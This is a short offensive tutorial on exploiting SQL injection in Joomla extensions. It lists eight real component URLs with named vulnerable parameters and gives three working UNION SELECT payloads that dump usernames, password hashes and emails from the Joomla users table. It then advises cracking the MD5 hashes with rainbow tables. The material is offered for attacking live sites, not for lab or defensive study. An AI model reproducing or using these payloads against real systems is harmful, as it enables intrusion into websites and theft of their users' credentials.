Joomla SQL Injection Tutorial

Joomla SQL Injection Tutorial

The probably most common case for 

hacked Joomla websites

is that a SQL injection vulnerability was exploited. A typical URL which is affected by this type of vulnerability looks like this:

index.php?option=com_blabla&category=5&Item=2

Typically the following parameters are vulnerable:

- cat, category, kat, categories, kats, cats
- id, userid, katid, catid
- sometimes also Item, entry, page

You can find out if a parameter is vulnerable when you change its value from e.g. 

category=5 to category='

.

Press enter and look for 

MySQL errors

in the website. If you find one, you might have discovered a SQL inkjection vulnerability.

In order to give you a better understanding and feeling of how vulnerable URLs might look like, I just show you some URLs which are known to be vulnerable (I discovered them):

URL:

index.php?option=com_jp_jobs&view=detail&id=1

Vulnerable parameter:

id

URL:

index.php?option=com_mv_restaurantmenumanager&task=menu_display\Venue=XX&mid=XX&Itemid=XX

Vulnerable parameter:

mid

URL:

index.php?option=com_qpersonel&task=qpListele&katid=2

Vulnerable parameter:

katid

URL:

index.php?com_pandafminigames&Itemid=&task=myscores&userid=2

Vulnerable parameter:

userid

URL:

index.php?option=com_joltcard&Itemid=21&task=view&cardID=6

Vulnerable parameter:

cardID

URL:

index.php?com_bfquiztrial&view=bfquiztrial&catid=1&Itemid=62

Vulnerable parameter:

catid

URL:

index.php?com_golfcourseguide&view=golfcourses&cid=1&id=79

Vulnerable parameter:

id

URL:

index.php?option=com_nkc&view=insc&lang=en&gp=10

Vulnerable parameter:

gp

Notice how many parameters look familiar to you? Yes, I mentioned them earlier as well-known parameters which are affected on regular basis :)

Since every Joomla database contains the same struture (like the same tables etc.), we know enough to inject a SQL Statement:

Example #1:

index.php?option=com_qpersonel&task=qpListele&katid=XX+AND+1=2+UNION+\SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,concat(\username, password)--

Example #2:

index.php?option=com_pandafminigames&Itemid=&task=myscores&userid=XX+\AND+1=2+UNION+SELECT+concat(password),2,concat(password),4,5,6,7,\8,9,10,11,12--

Example #3:

index.php?option=com_jp_jobs&view=detail&id=1+AND+1=2+UNION+SELECT+\group_concat(0x503077337220743020743368206330777321,name,username,\password,email,usertype,0x503077337220743020743368206330777321)--

The selected information will be shown within the website.
Select a username and password from the table and try to crack the MD5 Hash with the help of raindbow tables.

SQL injections in Joomla give us so much freedom as we can get. You can select everything you want from the database, and if you are lucky, there are also other tables in the databases which do not belong to Joomla but still contain some very interesting information.